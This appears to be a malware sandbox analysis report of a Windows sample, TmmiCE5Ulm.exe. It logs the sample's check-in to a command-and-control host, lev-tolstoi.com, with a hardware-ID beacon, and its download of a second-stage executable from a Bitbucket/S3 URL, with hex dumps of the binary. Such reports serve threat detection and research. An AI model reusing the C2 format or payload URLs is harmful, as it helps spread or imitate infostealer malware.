                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 06:26:45 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 43 41 36 46 36 30 37 31 46 46 34 43 34 32 41 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=CA6F6071FF4C42A1AC8923850305D13E
                                                                                                                                                                                                                                                                        2024-12-23 06:26:46 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=4skbemp9mebna8s29l6ogdjuln; expires=Fri, 18 Apr 2025 00:13:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GfalfO6sfq6vwyPFbdONhWOan%2BqkI%2FQmI6WFN2S%2FJNmeIL3uBwEq08cGzlJciv5TSF06wht%2ForDCPu2NP2ORNTxSi3ZtGyvxnPB1Vs2JaIfYq1vaUa9mwKq%2FhoOFRdW46CM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66482cbdd18cb9-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1786&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=987&delivery_rate=1593016&cwnd=183&unsent_bytes=0&cid=8e6e28b794eab318&ts=789&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 06:26:46 UTC198INData Raw: 63 30 0d 0a 45 74 72 69 45 53 30 6e 33 35 65 34 71 4a 52 49 73 43 75 75 4d 67 42 39 79 79 7a 59 48 6a 35 2f 34 41 6c 77 61 76 37 49 61 33 46 4a 6f 63 42 6b 44 78 33 39 2f 38 7a 63 35 44 75 4b 64 34 46 75 4c 78 2b 69 57 4c 70 72 58 52 53 46 66 56 34 46 6a 4b 38 33 58 6e 2b 6a 6a 48 52 61 55 4c 44 6c 30 39 76 6b 4b 64 4e 4f 6e 77 41 7a 54 76 6f 65 68 44 46 4e 48 49 35 74 4c 45 57 61 70 78 77 66 66 72 57 44 64 56 35 37 38 4e 48 58 32 76 6b 70 78 46 2f 48 58 47 63 2b 6f 30 32 71 64 30 6f 65 67 6d 55 56 52 4a 75 77 44 6c 4d 2b 2b 49 52 6c 44 78 33 76 75 35 72 4e 74 6e 4b 42 56 76 4d 3d 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c0EtriES0n35e4qJRIsCuuMgB9yyzYHj5/4Alwav7Ia3FJocBkDx39/8zc5DuKd4FuLx+iWLprXRSFfV4FjK83Xn+jjHRaULDl09vkKdNOnwAzTvoehDFNHI5tLEWapxwffrWDdV578NHX2vkpxF/HXGc+o02qd0oegmUVRJuwDlM++IRlDx3vu5rNtnKBVvM=
                                                                                                                                                                                                                                                                        2024-12-23 06:26:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        9192.168.2.549739185.166.143.494435600C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 06:26:48 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                                                                                                                                        2024-12-23 06:26:48 UTC5929INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Server: AtlassianEdge
                                                                                                                                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNKAFY4FX&Signature=JhHfBCFLHyX01YjJtloXBFvJXdM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJIMEYCIQDWGRIMb9LXXZfl79VFTq%2FskFvxmioOtofL0dfIDqFZ2gIhAJP8GSyu6qftK4UeqX9cHuX5XOOr967KFLOAaxmwQGOTKrACCM%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2Igx0FWF5ybJCkmhX8pgqhAI4vlZyemYNIdhtILr1PBwGVPbyRawX2P9SOAz2sH4A2MXWbLs4VI9hExZK0Et1K%2FZfcAv2DK2%2F%2F3UbHXRF09xPQgClbYp%2BUS1fkeGjEn1qP%2BWN%2F0mNeOH6WJKEOgO9kxNbGmFR5%2FkdpRFho4uTMfUFiKjlhLrQRw6zkgUAadjCAt42zf2Eg5d4xi8HlEW7deLbE%2FM71ylNr%2FYb3X3TrZqMv1qaJkHPadg%2BUk0sct3PeuuUp0CaqVtex3wqgZbKjEbcNjMQ31Hh7gqXTU6knOY57iFcj%2BPJ5cpn8pXxspPZdFJdCoU3R2oQlF2BkZWmj6nywk6Rq9sTdCADM4SjzSxySMlaGzDBgqS7BjqcAXQQ9opzWNiG8NvY5n4BKs1tDtNnnJkDK9ZBfjAjPIA8iWxzfe9xFtNIbh1RExp6zD%2B7N2NmnwOrDW8mM [TRUNCATED]
                                                                                                                                                                                                                                                                        Expires: Mon, 23 Dec 2024 06:26:48 GMT
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                                        X-Used-Mesh: False
                                                                                                                                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                                                                                                                                                        X-Served-By: e6f4fa3680f5
                                                                                                                                                                                                                                                                        X-Version: c9b3998323c0
                                                                                                                                                                                                                                                                        X-Static-Version: c9b3998323c0
                                                                                                                                                                                                                                                                        X-Request-Count: 526
                                                                                                                                                                                                                                                                        X-Render-Time: 0.05421566963195801
                                                                                                                                                                                                                                                                        X-B3-Traceid: 76b057f9c66b4b7981fe6f9429dd4989
                                                                                                                                                                                                                                                                        X-B3-Spanid: 495678fd229469fb
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Content-Security-Policy: object-src 'none'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend [TRUNCATED]
                                                                                                                                                                                                                                                                        X-Usage-Quota-Remaining: 999055.167
                                                                                                                                                                                                                                                                        X-Usage-Request-Cost: 960.90
                                                                                                                                                                                                                                                                        X-Usage-User-Time: 0.028827
                                                                                                                                                                                                                                                                        X-Usage-System-Time: 0.000000
                                                                                                                                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Atl-Traceid: 76b057f9c66b4b7981fe6f9429dd4989
                                                                                                                                                                                                                                                                        Atl-Request-Id: 76b057f9-c66b-4b79-81fe-6f9429dd4989
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                                                                                                                        Server-Timing: atl-edge;dur=167,atl-edge-internal;dur=5,atl-edge-upstream;dur=163,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        10192.168.2.5497453.5.16.864435600C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 06:26:50 UTC1338OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNKAFY4FX&Signature=JhHfBCFLHyX01YjJtloXBFvJXdM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJIMEYCIQDWGRIMb9LXXZfl79VFTq%2FskFvxmioOtofL0dfIDqFZ2gIhAJP8GSyu6qftK4UeqX9cHuX5XOOr967KFLOAaxmwQGOTKrACCM%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2Igx0FWF5ybJCkmhX8pgqhAI4vlZyemYNIdhtILr1PBwGVPbyRawX2P9SOAz2sH4A2MXWbLs4VI9hExZK0Et1K%2FZfcAv2DK2%2F%2F3UbHXRF09xPQgClbYp%2BUS1fkeGjEn1qP%2BWN%2F0mNeOH6WJKEOgO9kxNbGmFR5%2FkdpRFho4uTMfUFiKjlhLrQRw6zkgUAadjCAt42zf2Eg5d4xi8HlEW7deLbE%2FM71ylNr%2FYb3X3TrZqMv1qaJkHPadg%2BUk0sct3PeuuUp0CaqVtex3wqgZbKjEbcNjMQ31Hh7gqXTU6knOY57iFcj%2BPJ5cpn8pXxspPZdFJdCoU3R2oQlF2BkZWmj6nywk6Rq9sTdCADM4SjzSxySMlaGzDBgqS7BjqcAXQQ9opzWNiG8NvY5n4BKs1tDtNnnJkDK9ZBfjAjPIA8iWxzfe9xFtNIbh1RExp6zD%2B7N2NmnwOrDW8mME7nCVE9fi5w6eJ3rXchZXw4BEgi14dReaKJTufHw9TIj [TRUNCATED]
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                                        2024-12-23 06:26:51 UTC574INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        x-amz-id-2: vLBwj/JY9JYKR84j/Hp2YZpLuUfFprvViPmeIHiJWosiV7egfhgMwbSPKoL89LSDU2eiafjeRlp2gjAjFUEDeeo/v+X2gud6
                                                                                                                                                                                                                                                                        x-amz-request-id: YEP2875BAVXAHBJ8
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:51 GMT
                                                                                                                                                                                                                                                                        Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                                                                                                                                        ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                        x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                        Content-Length: 1325507
                                                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-23 06:26:51 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                                                                                                                                        2024-12-23 06:26:51 UTC450INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                                                                                                                                        Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                                                                                                                                                        2024-12-23 06:26:51 UTC16384INData Raw: 00 3b c3 74 07 50 ff 15 2c 90 40 00 a1 6c 1d 44 00 3b c3 74 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1
                                                                                                                                                                                                                                                                        Data Ascii: ;tP,@lD;tP0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX
                                                                                                                                                                                                                                                                        2024-12-23 06:26:51 UTC1024INData Raw: 69 00 6e 00 64 00 6f 00 77 00 00 00 00 00 50 00 6f 00 70 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c
                                                                                                                                                                                                                                                                        Data Ascii: indowPop: stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"Fil
                                                                                                                                                                                                                                                                        2024-12-23 06:26:51 UTC16384INData Raw: 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53
                                                                                                                                                                                                                                                                        Data Ascii: eDirectory: can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)S
                                                                                                                                                                                                                                                                        2024-12-23 06:26:51 UTC1024INData Raw: e8 c7 e6 52 b1 3a d6 d7 02 ab 3a 7c 39 58 c5 d6 e5 20 f1 ec 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be
                                                                                                                                                                                                                                                                        Data Ascii: R::|9X 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\S
                                                                                                                                                                                                                                                                        2024-12-23 06:26:51 UTC1749INData Raw: d4 c8 e6 cd 9b 1b d9 b2 65 8b 42 be 6f dd ba 55 21 d3 b7 6d db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5
                                                                                                                                                                                                                                                                        Data Ascii: eBoU!m/od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz
                                                                                                                                                                                                                                                                        2024-12-23 06:26:51 UTC9000INData Raw: d0 9b cc 4a 88 37 9b 81 b5 cb 97 d9 92 b5 3d 81 9b 49 5f 84 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61
                                                                                                                                                                                                                                                                        Data Ascii: J7=I_AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hza
                                                                                                                                                                                                                                                                        2024-12-23 06:26:51 UTC16384INData Raw: ce 07 72 4d 53 19 0b 7d 79 4e 29 f9 65 1d a4 a9 19 ef 32 ef 90 4f 56 90 9a 56 96 c3 2d 79 fb b2 0a 08 37 72 1a 7e 5b 90 4f d9 45 05 94 c5 fb 9c 71 28 8a 32 0e 46 50 66 42 32 cf e3 e5 79 bd ba c0 ab 46 92 d6 50 6a 9c 6e ff de 16 b0 3e e4 45 d4 2b d4 65 d3 00 a0 95 6f 65 00 30 0d a7 01 c4 00 e0 6e 01 5c 00 08 0d 41 4f 00 2e 24 8c 88 88 50 2f 6e 82 e6 f4 eb d7 4f bd 0b a0 05 03 30 8e 75 0a a7 c6 a1 57 d0 2e 68 d8 75 03 60 1f ae ba 01 c0 6b 3a f1 72 0d 04 30 9e e2 f7 cb 5f fd 52 b9 b8 a3 dc 62 2a c8 e4 20 8e 89 a3 b4 e8 58 4a 4f 48 a4 d4 24 0e 60 04 2f 8b bb 04 71 4b 58 99 02 45 3a bb ff c2 24 4a c9 4f a6 82 5d e5 74 94 85 ff a3 76 ff ad 38 fa f4 17 54 b0 b3 9c 52 f3 f9 f7 45 1c f4 99 4d 3d 07 2d 19 00 f9 d4 31 03 55 12 83 98 00 95 d8 8a 99 f2 22 45 61 31 27
                                                                                                                                                                                                                                                                        Data Ascii: rMS}yN)e2OVV-y7r~[OEq(2FPfB2yFPjn>E+eoe0n\AO.$P/nO0uW.hu`k:r0_Rb* XJOH$`/qKXE:$JO]tv8TREM=-1U"Ea1'
                                                                                                                                                                                                                                                                        2024-12-23 06:26:51 UTC1024INData Raw: 25 43 80 64 9e ca c4 f0 7c 08 be fb a1 50 da cb 49 ca 2f 3c 82 a2 79 5a 3a 9b 03 b4 fe f5 73 c1 ba 19 d0 0d 81 18 01 c1 34 02 82 08 98 89 08 9c 89 08 60 6b 98 42 7a a9 58 ad d3 0a 47 db 28 06 c0 11 98 5f 52 54 6a bb e0 af a4 9a 8a 0b b9 45 6f f1 bf fa 3a f5 ef 52 4e 52 8e 52 b6 f8 94 f2 c6 f2 68 fd e3 b9 ff 30 00 38 0d 50 5f 53 4d d5 65 25 54 59 94 4f 0d 55 e5 74 ee f4 09 fa f0 ec 49 3a 51 c7 a2 5f 5a a8 ae 09 a8 a9 28 a5 aa ca 0a 75 11 60 45 05 9e 46 58 a2 fe 0b c7 57 c4 5f 7a 8e a4 f7 08 9f 71 31 f1 14 16 1c 49 c1 fe 61 aa eb 3f fc 50 14 c5 46 e3 c9 7c 5c e7 12 6d f5 4e ea a5 d4 55 b3 1e 4b d7 3e a6 c9 b8 23 c1 17 a4 a5 0f b1 17 11 d6 0d 80 cc 83 d0 22 76 11 e7 2a 17 d8 3f 75 a4 d1 e0 08 f5 4e 79 3b f8 8e dc 80 d8 57 c2 6e 11 df 82 e4 01 47 48 de 68 2b
                                                                                                                                                                                                                                                                        Data Ascii: %Cd|PI/<yZ:s4`kBzXG(_RTjEo:RNRRh08P_SMe%TYOUtI:Q_Z(u`EFXW_zq1Ia?PF|\mNUK>#"v*?uNy;WnGHh+


                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:01:26:17
                                                                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\TmmiCE5Ulm.exe"
